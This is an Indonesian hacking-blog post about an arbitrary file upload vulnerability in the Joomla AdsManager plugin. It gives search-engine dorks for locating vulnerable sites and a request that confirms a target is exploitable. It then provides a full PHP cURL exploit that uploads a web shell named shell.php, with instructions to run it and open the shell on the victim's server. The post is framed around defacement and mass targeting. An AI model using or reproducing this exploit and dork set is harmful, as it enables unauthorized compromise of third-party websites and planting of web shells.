Joomla Ads Manager Arbitrary File Upload Vulnerability - cowok tersakiti team

Latest

TUTORIAL,HACKING,DEFACE,BLOGGER,ANALIST,ARTICLES,NEWS

BANNER 728X90

Wednesday, March 1, 2017

Joomla Ads Manager Arbitrary File Upload Vulnerability



Daftar celah plugin joomla dan wordpress emang tidak ada henti-hentinya, baru di path 1 muncul celah lagi, ibarat mati satu tumbuh seribu.

untuk kalian yang memakai CMS joomla dan wordpress harus berhati-hati kalau memasang plugin dan rajin di update jika ada pembaruan.

Kali ini celahnya di plugin joomla adsmanager, sudah lama sih sebenarnya dan udah basi, tapi apa salahnya berbagi lagi.

Oke langsung saja.

Bahan-bahan:

  • Dork :
inurl:index.php?option=com_adsmanager
intext:"adsmanager version 2.5"
"com_adsmanager" site:nama domain

  • Untuk cek vuln tidaknya
http://target/index.php?option=com_adsmanager&task=upload&tmpl=component
Jika muncul {"jsonrpc" : "2.0", "result" : null, "id" : "id","tmpfile" : "_960"}
Berati target Vuln

  • Exploits
 <?php
$url = "http://target/index.php?option=com_adsmanager&task=upload&tmpl=component";
$post = array
(
"file" => "@hack.png",
//file asal
"name" => "shell.php"
//shell kamu
);
$ch = curl_init ("$url");
curl_setopt ($ch, CURLOPT_RETURNTRANSFER,
1);
curl_setopt ($ch, CURLOPT_FOLLOWLOCATION,
1);
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT,
5);
curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt ($ch, CURLOPT_POST, 1);
@curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
$data = curl_exec ($ch);
curl_close ($ch);
echo $data;
?> 

  • Ganti target ke target kalian, dan jangan lupa file hack.png dan shell.php juga di ganti, Lalu Simpan kode di atas di folder C: > Xampp > php dengan format file.php
  • Buka xampp, Aktifkan Apache dan Mysql
  • Run exploit di atas dengan CMD
  • Shell acces target/tmp/plupload/shell.php
  • Selesai

No comments:

Post a Comment